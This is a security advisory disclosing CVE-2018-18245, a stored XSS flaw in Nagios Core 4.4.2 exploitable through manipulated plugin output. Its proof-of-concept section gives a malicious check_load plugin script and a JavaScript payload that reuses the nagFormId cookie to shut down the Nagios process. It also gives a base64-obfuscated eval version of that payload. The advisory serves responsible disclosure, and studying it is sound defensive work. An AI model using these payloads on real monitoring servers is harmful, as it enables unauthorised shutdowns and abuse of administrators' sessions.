usd-2018-0026 | Nagios Core/4.4.2
Advisory ID: usd-2018-0026
CVE Number: CVE-2018-18245
Affected Product: Nagios Core
Affected Version: 4.4.2
Vulnerability Type: Cross-Site Scripting (XSS)
Security Risk: Medium
Vendor URL: https://www.nagios.com
Vendor Status: Not fixed
Description
A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output.
Nagios Core is a platform for network and system monitoring. It provides a web application for administrators which displays the current status of the monitored entities. Nagios uses plugins executed by the central server and plugins executed on the monitored endpoints via the NRPE service. An attacker that controls one of those endpoints has the ability to either modify plugin output or to replace the plugins executed on those endpoints. Accordingly, attackers may be able to control what is displayed to authenticated users within the web application. Nagios takes care to properly encode plugin results in most places to prevent XSS attacks. However, in the case of alert summary reports the output is not encoded, enabling attacks against the web application and its users.
Proof of Concept
Simple PoC:
An attacker that controls one of systems monitored with NRPE replaces the check_load plugin by the following simple bash script:
VERSION=1.0
VERBOSE=0
PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e 's,[\\/][^\\/][^\\/]*$,,'`
. $PROGPATH/utils.sh
echo -n "alert(document.cookie)"
exitCode=1
echo -n "Testoutput"
exit $exitCode
As soon as the results of the modified check show up in the nagios web interface the payload should be in place. Note: The check status (exitCode) may need to be changed (to either 1 or 2) to make sure that an alert for the current status will show up in the summary page. When a user now views an alert summary report at /nagios/cgi-bin/summary.cgi and creates a report that contains the manipulated check result the payload will be executed.
Denial of Service PoC: Nagios Process Shutdown A more interesting attack would be able to shut down the Nagios process on the central server. To achieve this, the following JavaScript code will be used:
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/10.10.10.10\/nagios\/cgi-bin\/cmd.cgi", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var cvalue = document.cookie.substring(10);
var body = "nagFormId="+cvalue;
body+="&cmd_typ=14&cmd_mod=2&btnSubmit=Commit";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
The above script extracts the HTTP value of the NagFormId cookie and places it into the nagFormId form variable. It then automatically sends a POST request to /nagios/cgi-bin/cmd.cgi with the cmd_typ=14 which causes the Nagios process to shut down. This functionality is available to users under the „Process Info“ navigation item. Note: The POST URL needs to point to the hostname or IP address of the actual Nagios server.
To prevent issues with semicolons in the JavaScript payload the JavaScript code is encoded with base64, wrapped with an eval() call and placed into the malicious plugin. The full PoC plugin then looks like this:
VERSION=1.0
VERBOSE=0
PROGNAME=`/usr/bin/basename $0`
PROGPATH=`echo $0 | /bin/sed -e 's,[\\/][^\\/][^\\/]*$,,'`
. $PROGPATH/utils.sh
echo -n "eval(atob('ICBmdW5jdGlvbiBzdWJtaXRSZXF1ZXN0KCkKICAgICAgewoJICAgICAgICAgIHZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKCSAgICAgICAgICB4aHIub3BlbigiUE9TVCIsICJodHRwOlwvXC8xMC4xMC4xMC4xMFwvbmFnaW9zXC9jZ2ktYmluXC9jbWQuY2dpIiwgdHJ1ZSk7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsICJ0ZXh0XC9odG1sLGFwcGxpY2F0aW9uXC94aHRtbCt4bWwsYXBwbGljYXRpb25cL3htbDtxPTAuOSwqXC8qO3E9MC44Iik7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdC1MYW5ndWFnZSIsICJlbi1VUyxlbjtxPTAuNSIpOwoJICAgICAgICAgIHhoci5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb25cL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwoJICAgICAgICAgIHhoci53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwoJICAJdmFyIGN2YWx1ZSA9IGRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcoMTApOwoJICAgICAgICAgIHZhciBib2R5ID0gIm5hZ0Zvcm1JZD0iK2N2YWx1ZTsKCSAgCWJvZHkrPSImY21kX3R5cD0xNCZjbWRfbW9kPTImYnRuU3VibWl0PUNvbW1pdCI7CgkgICAgICAgICAgdmFyIGFCb2R5ID0gbmV3IFVpbnQ4QXJyYXkoYm9keS5sZW5ndGgpOwoJICAgICAgICAgIGZvciAodmFyIGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCgkJICAgICAgICAgICAgYUJvZHlbaV0gPSBib2R5LmNoYXJDb2RlQXQoaSk7IAoJICAgICAgICAgIHhoci5zZW5kKG5ldyBCbG9iKFthQm9keV0pKTsKCSAgICAgICAgfQogICAgICBzdWJtaXRSZXF1ZXN0KCk7Cg=='))"
exitCode=1
echo -n "Testoutput"
exit $exitCode
Fix
Encode output received from nagios plugins.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Timeline
- 2018-09-11 first contact request via security@nagios.com
- 2018-09-12 provided advisory via our secure transfer platform
- 2018-10-12 received CVE ID and notified vendor about it
- 2018-12-07 Security advisory released
Credits
This security vulnerabilities was found by Maximilian Boehner of usd AG.